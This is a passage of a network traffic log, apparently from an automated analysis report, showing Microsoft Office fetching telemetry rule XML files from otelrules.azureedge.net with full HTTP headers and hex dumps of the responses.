                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:48 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:48 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1352
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                          ETag: "0x8DC582BE9DEEE28"
                                                                                                                          x-ms-request-id: eb4d8ac2-801e-008f-2a87-1b2c5d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162148Z-17db6f7c8cfp6mfve0htepzbps00000004k0000000007qyu
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:48 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          109192.168.2.44987413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:48 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:48 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:48 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1368
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                          ETag: "0x8DC582BDDC22447"
                                                                                                                          x-ms-request-id: a2b1ec5b-001e-002b-54a3-1b99f2000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162148Z-17db6f7c8cf6qp7g7r97wxgbqc00000004g0000000005rse
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:48 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          110192.168.2.44987513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:48 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:48 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:48 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1401
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                          ETag: "0x8DC582BE055B528"
                                                                                                                          x-ms-request-id: 37770a76-901e-0048-046f-1cb800000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162148Z-17db6f7c8cf6f7vv3recfp4a6w000000022000000000g4km
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:48 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          111192.168.2.44987613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:49 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:49 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:49 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1364
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                          ETag: "0x8DC582BE1223606"
                                                                                                                          x-ms-request-id: 8d6d9129-701e-0001-43c0-1ab110000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162149Z-17db6f7c8cfp6mfve0htepzbps00000004ng000000001yb2
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:49 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          112192.168.2.44987713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:49 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:49 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:49 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1397
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                          ETag: "0x8DC582BE7262739"
                                                                                                                          x-ms-request-id: c0002b7f-501e-0029-6e1c-1cd0b8000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162149Z-17db6f7c8cffhvbz3mt0ydz7x400000003cg000000003rwy
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:49 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          113192.168.2.44987913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:49 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:49 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:49 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1403
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                          ETag: "0x8DC582BDCB4853F"
                                                                                                                          x-ms-request-id: 73142df5-301e-0052-1d1f-1b65d6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162149Z-17db6f7c8cfvq8pt2ak3arkg6n000000036g0000000033he
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:49 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          114192.168.2.44987813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:49 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:49 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:49 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1360
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                          ETag: "0x8DC582BDDEB5124"
                                                                                                                          x-ms-request-id: fe1a38a0-a01e-0053-6ad8-1a8603000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162149Z-17db6f7c8cffhvbz3mt0ydz7x400000003ag000000008n2z
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:49 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          115192.168.2.44988013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:49 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:49 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:49 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1366
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                          ETag: "0x8DC582BDB779FC3"
                                                                                                                          x-ms-request-id: 37d30e57-901e-0015-1248-1cb284000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162149Z-17db6f7c8cf6f7vv3recfp4a6w000000022g00000000gxn3
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:49 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          116192.168.2.44988113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:49 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:50 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:49 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1397
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                          ETag: "0x8DC582BDFD43C07"
                                                                                                                          x-ms-request-id: 44110a29-201e-00aa-4c81-1a3928000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162149Z-17db6f7c8cfq2j6f03aq9y8dns00000004cg0000000047p1
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:50 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          117192.168.2.44988213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:50 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:50 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:50 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1360
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                          ETag: "0x8DC582BDD74D2EC"
                                                                                                                          x-ms-request-id: fa68fd7e-e01e-0099-0ae2-1ada8a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162150Z-17db6f7c8cfvq8pt2ak3arkg6n000000037g000000000116
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:50 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
